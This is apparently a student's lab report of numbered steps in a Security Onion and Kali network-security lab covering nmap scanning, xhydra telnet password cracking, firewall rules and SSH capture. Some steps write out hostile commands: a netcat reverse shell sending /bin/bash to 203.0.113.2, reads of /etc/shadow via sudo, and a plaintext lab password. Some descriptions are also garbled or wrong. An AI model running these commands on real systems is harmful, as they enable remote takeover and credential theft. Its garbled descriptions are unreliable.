Stephen Dick CVF1083 1/30/18 Lab 3
Stephen Dick CVF1083 1/30/18 Lab 3
CVF1083
1/30/18
Lab 3
1.
Went to the top left, clicked on the blue onion icon>security onion>wireshark at the bottom and opened
it.
2.
Navigated to the top bar and opened the terminal. Ran the command ifconfig to see the addresses
associated.
4.
Ran the command nmap -p 23 192.168.1.0/24 to scan port 23 for any open subnets within the port.
5.
Used the telnet command and couldn’t get a connection between the machines.
6.
Used xhydra command in the kali terminal and changed the ip to 192.168.1.50 and the protocol to
telnet.
7.
Typed xhydra in the terminal in kali, and changed the useraname to student
8.
Started the password cracking, and this showed up, unsure of what I have done wrong with the setup
1.
Telnetted the ip 192.168.1.50
2.
3.
Set action > Reject
4.
Set the destination to internal gw net
Set the dest port range to and from telnet 23 and saved all the settings.
5.
After accepting the settings, I was shown a warning and I applied the changes.
6.
1.
2.
Started wireshark on the security onion for eth0 scan.
3.
Typed the command ssh student 192.168.1.50 and used securepassword as the password
4.
Went to the security onion and typed ssh in the filter, found out there was a key exchange over the
network.
5.
6.
Key presented after checking the tcp stream
7.
Used the command netstat -tan | grep 22 to check the port status of 22
8.
9.
Used the command ls to check the list of files iin the directory.
10.
11.
Used the command sudo su and used the password securepassword to gain access to the root of the
root machine.
12.
Used the command useradd admin1 to create the account admin1 on the ubuntu machine
13.
Used the command cat /etc/shadow | grep admin1 to check the ipv6 of admin1
14.
Used the command service proftpd status to check the tpd status of ubuntu, I then exited the ssh
connection
1.
Used the command nc -l –p 443 to listen to traffic over port 443(https)
2.
Used the command netstat -tan | grep 443 to check the status of port 443
3.
Used the command nc 203.0.113.2 443 -e /bin/bash to send shells to port 443 on linux
4.
Used the command uname -a as the 443 port was listening.
5.
Used the command ifconfig to check my network interfaces as the security onion
6.
8.
Used the command echo mypassword | sudo -S cat /etc/shadow to see the conetents of the folder
9.
Used the command netstat -tan | grep 443 to see the connections on port 443.